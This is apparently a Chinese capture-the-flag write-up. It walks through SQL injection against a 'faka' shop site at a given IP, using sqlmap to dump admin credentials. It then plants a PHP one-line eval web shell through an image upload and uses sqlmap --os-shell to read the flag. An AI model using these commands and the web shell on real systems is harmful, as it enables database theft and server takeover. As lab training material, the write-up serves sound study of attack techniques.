CTF实战(faka注入)

CTF实战

SQL注入(faka)

方法一:蚁键注入

首先获取实战链接
CTF实战(faka注入)
访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处
CTF实战(faka注入)
打开burp实行抓包,检测注入点是否正确
CTF实战(faka注入)
将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码
输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dump
如图,得到后台管理员密码和用户名
CTF实战(faka注入)
进入后台登入
CTF实战(faka注入)
寻找木马植入点,并植入一句话木马,用文件的方式植入
一句话木马为

<?php @eval($_POST['shell']);?>

CTF实战(faka注入)
在此处上传一张图片以及木马文件,上传成功会显示成功字样
CTF实战(faka注入)
复制图片链接并新标签页打开,删除地址png后面的一串字母发现图片并不改变,所以此处可植入木马
CTF实战(faka注入)

CTF实战(faka注入)
所以可植入木马,将png改为php测试木马是否植入,打开显示空白即植入成功
CTF实战(faka注入)
复制地址链接,放入蚁键测试链接并添加打开
如上篇文章所讲步骤相同
CTF实战(faka注入)
打开即可看到文档,寻找flag所在地
CTF实战(faka注入)

CTF实战(faka注入)
这就找到CTF实战的flag

方法二:sqlmap直接注入找到flag

sqlmap找到后台管理员密码后进入后台,–os-shell

当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。

在MySQL、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。

那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server,sqlmap将会使用xp_cmdshell存储过程,如果被禁(在Microsoft SQL Server 2005及以上版本默认禁制),sqlmap会重新启用它,如果不存在,会自动创建。

输入
sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” --os-shell
CTF实战(faka注入)
输入ls进入目录
CTF实战(faka注入)
输入ls /
CTF实战(faka注入)
读取flag.sh,输入cat /flag.sh
CTF实战(faka注入)
如图可知flag在目录echo F L A G > / h o m e / FLAG > /home/ FLAG>/home/USER/flag中
输入ls /home/
CTF实战(faka注入)
输入cat /home/flag
CTF实战(faka注入)
如图,得到flag。